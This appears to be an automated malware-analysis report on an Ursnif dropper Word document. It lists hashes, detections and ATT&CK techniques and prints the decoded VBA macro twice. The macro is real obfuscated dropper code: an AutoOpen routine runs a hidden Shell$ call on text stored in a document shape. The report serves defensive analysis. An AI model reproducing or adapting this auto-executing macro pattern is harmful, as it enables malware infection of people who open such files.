Ursnif Office (OLE) malware analysis — malicious · 4804415c7d9aa1fc

MALICIOUS

Office (OLE)

74.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 072869882f2e6d6c8a25fbe82cb8b3df SHA-1: 7113478393c17246f6692e0a360525191ded2d84 SHA-256: 4804415c7d9aa1fcc6f5638416d8192504dfd6c183fd64aade03a3f667f7ff61

202 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating the Ursnif family. The presence of an AutoOpen VBA macro and a critical 'Shell()' call strongly suggests that the macro is designed to execute arbitrary commands. This functionality is typically used to download and execute a secondary payload, aligning with the dropper behavior.

Heuristics 6

ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3305 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3305 bytes
SHA-256: `94d51d658b8f52700bf1257daa4c5645af55473605f965497c8a4e4621ff50ff`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "bsemeze" Function KnUDnu() Dim cfiguc As Integer Dim QFLer As Long cfiguc = 6230 + 6623 Dim vEoTVi As Integer Dim CVpSAqPs As Long vEoTVi = 2492 + 1108 Dim KWOOc As Integer Dim SUkNxO As Long KWOOc = 5775 + 4640 Dim UaTuqQjx As Integer Dim fjevifigi As Long UaTuqQjx = 9846 + 4744 Dim jqyp As Integer Dim fUqpf As Long jqyp = 2538 + 1660 Dim xrefugyq As Integer Dim IXgxhfx As Long xrefugyq = 2978 + 5102 Dim wgNYvPob As Integer Dim RbFwRk As Long wgNYvPob = 4452 + 7232 Dim ijsamuUv As Integer Dim GcqVV As Long ijsamuUv = 1292 + 7618 Dim PRYHhQ As Integer Dim dmox As Long PRYHhQ = 5535 + 2628 mlaj = "zkumukaso" Dim oErmSL As Integer Dim YmQWTU As Long oErmSL = 9619 + 3492 Dim dpib As Integer Dim lgicek As Long dpib = 5136 + 7907 Dim wdacux As Integer Dim dvytuj As Long wdacux = 2995 + 2545 Dim hcawepa As Integer Dim rguduhun As Long hcawepa = 2408 + 7373 Dim dpynyn As Integer Dim BhFkeLRC As Long dpynyn = 2069 + 4583 Dim MfgjPU As Integer Dim dcabypuga As Long MfgjPU = 6527 + 1340 Dim IzMlhudj As Integer Dim JxCMKT As Long IzMlhudj = 8083 + 4791 Dim pwifyko As Integer Dim cfaqy As Long pwifyko = 4321 + 2136 Dim xUDpN As Integer Dim gfen As Long xUDpN = 2295 + 5312 Set KnUDnu = ActiveDocument.Shapes(mlaj) End Function Sub AutoOpen() Dim gPbSsq As Integer Dim hdikuqygalo As Long gPbSsq = 7034 + 1157 Dim spydiri As Integer Dim lxonujifiho As Long spydiri = 9719 + 2954 Dim btyguj As Integer Dim jvob As Long btyguj = 1497 + 9311 Dim tbyfoqy As Integer Dim JRPdViWp As Long tbyfoqy = 2586 + 7494 Dim MgFJb As Integer Dim nsebagigyp As Long MgFJb = 4043 + 1942 Dim SoRRSrZ As Integer Dim xjujebebu As Long SoRRSrZ = 7964 + 4141 Set EbLXcZN = KnUDnu Dim tpcQlgO As Integer Dim xgonakisefy As Long tpcQlgO = 8573 + 9366 Dim smud As Integer Dim tnirixi As Long smud = 2239 + 9409 Dim IDBNMc As Integer Dim qRTEV As Long IDBNMc = 8521 + 3009 Interaction.Shell$ _ EbLXcZN.AlternativeText, vbHide Dim JvMOwuB As Integer Dim rzoz As Long JvMOwuB = 9343 + 1562 Dim dZRCQd As Integer Dim mmhlXF As Long dZRCQd = 7170 + 7870 Dim CTEayr As Integer Dim URmzNN As Long CTEayr = 4047 + 9243 Dim URMobP As Integer Dim UmzEAOW As Long URMobP = 5949 + 3947 Dim mnoke As Integer Dim nduh As Long mnoke = 9100 + 5588 Dim skMdW As Integer Dim PqrQiCx As Long skMdW = 8222 + 7336 Dim eTPYKua As Integer Dim Rsyda As Long eTPYKua = 3506 + 2957 Dim APTDW As Integer Dim cGthdKW As Long APTDW = 3570 + 6948 Dim ggeme As Integer Dim qfoco As Long ggeme = 9244 + 1662 Dim rlepilap As Integer Dim sknKya As Long rlepilap = 5267 + 9289 Dim HIyeQk As Integer Dim DnkuXEo As Long HIyeQk = 9524 + 4967 Dim OCCXpxx As Integer Dim AZywqX As Long OCCXpxx = 4605 + 9212 End Sub

SHA-256: 94d51d658b8f52700bf1257daa4c5645af55473605f965497c8a4e4621ff50ff

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bsemeze"
Function KnUDnu()


Dim cfiguc As Integer

Dim QFLer As Long

cfiguc = 6230 + 6623

Dim vEoTVi As Integer

Dim CVpSAqPs As Long

vEoTVi = 2492 + 1108

Dim KWOOc As Integer
Dim SUkNxO As Long
KWOOc = 5775 + 4640

Dim UaTuqQjx As Integer

Dim fjevifigi As Long

UaTuqQjx = 9846 + 4744

Dim jqyp As Integer

Dim fUqpf As Long

jqyp = 2538 + 1660

Dim xrefugyq As Integer
Dim IXgxhfx As Long
xrefugyq = 2978 + 5102

Dim wgNYvPob As Integer

Dim RbFwRk As Long

wgNYvPob = 4452 + 7232

Dim ijsamuUv As Integer

Dim GcqVV As Long

ijsamuUv = 1292 + 7618

Dim PRYHhQ As Integer
Dim dmox As Long
PRYHhQ = 5535 + 2628

mlaj = "zkumukaso"


Dim oErmSL As Integer

Dim YmQWTU As Long

oErmSL = 9619 + 3492

Dim dpib As Integer

Dim lgicek As Long

dpib = 5136 + 7907

Dim wdacux As Integer
Dim dvytuj As Long
wdacux = 2995 + 2545

Dim hcawepa As Integer

Dim rguduhun As Long

hcawepa = 2408 + 7373

Dim dpynyn As Integer

Dim BhFkeLRC As Long

dpynyn = 2069 + 4583

Dim MfgjPU As Integer
Dim dcabypuga As Long
MfgjPU = 6527 + 1340

Dim IzMlhudj As Integer

Dim JxCMKT As Long

IzMlhudj = 8083 + 4791

Dim pwifyko As Integer

Dim cfaqy As Long

pwifyko = 4321 + 2136

Dim xUDpN As Integer
Dim gfen As Long
xUDpN = 2295 + 5312

Set KnUDnu = ActiveDocument.Shapes(mlaj)


End Function
Sub AutoOpen()


Dim gPbSsq As Integer

Dim hdikuqygalo As Long

gPbSsq = 7034 + 1157

Dim spydiri As Integer

Dim lxonujifiho As Long

spydiri = 9719 + 2954

Dim btyguj As Integer
Dim jvob As Long
btyguj = 1497 + 9311

Dim tbyfoqy As Integer

Dim JRPdViWp As Long

tbyfoqy = 2586 + 7494

Dim MgFJb As Integer

Dim nsebagigyp As Long

MgFJb = 4043 + 1942

Dim SoRRSrZ As Integer
Dim xjujebebu As Long
SoRRSrZ = 7964 + 4141

Set EbLXcZN = KnUDnu


Dim tpcQlgO As Integer

Dim xgonakisefy As Long

tpcQlgO = 8573 + 9366

Dim smud As Integer

Dim tnirixi As Long

smud = 2239 + 9409

Dim IDBNMc As Integer
Dim qRTEV As Long
IDBNMc = 8521 + 3009

Interaction.Shell$ _
EbLXcZN.AlternativeText, vbHide


Dim JvMOwuB As Integer

Dim rzoz As Long

JvMOwuB = 9343 + 1562

Dim dZRCQd As Integer

Dim mmhlXF As Long

dZRCQd = 7170 + 7870

Dim CTEayr As Integer
Dim URmzNN As Long
CTEayr = 4047 + 9243

Dim URMobP As Integer

Dim UmzEAOW As Long

URMobP = 5949 + 3947

Dim mnoke As Integer

Dim nduh As Long

mnoke = 9100 + 5588

Dim skMdW As Integer
Dim PqrQiCx As Long
skMdW = 8222 + 7336

Dim eTPYKua As Integer

Dim Rsyda As Long

eTPYKua = 3506 + 2957

Dim APTDW As Integer

Dim cGthdKW As Long

APTDW = 3570 + 6948

Dim ggeme As Integer
Dim qfoco As Long
ggeme = 9244 + 1662

Dim rlepilap As Integer

Dim sknKya As Long

rlepilap = 5267 + 9289

Dim HIyeQk As Integer

Dim DnkuXEo As Long

HIyeQk = 9524 + 4967

Dim OCCXpxx As Integer
Dim AZywqX As Long
OCCXpxx = 4605 + 9212

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.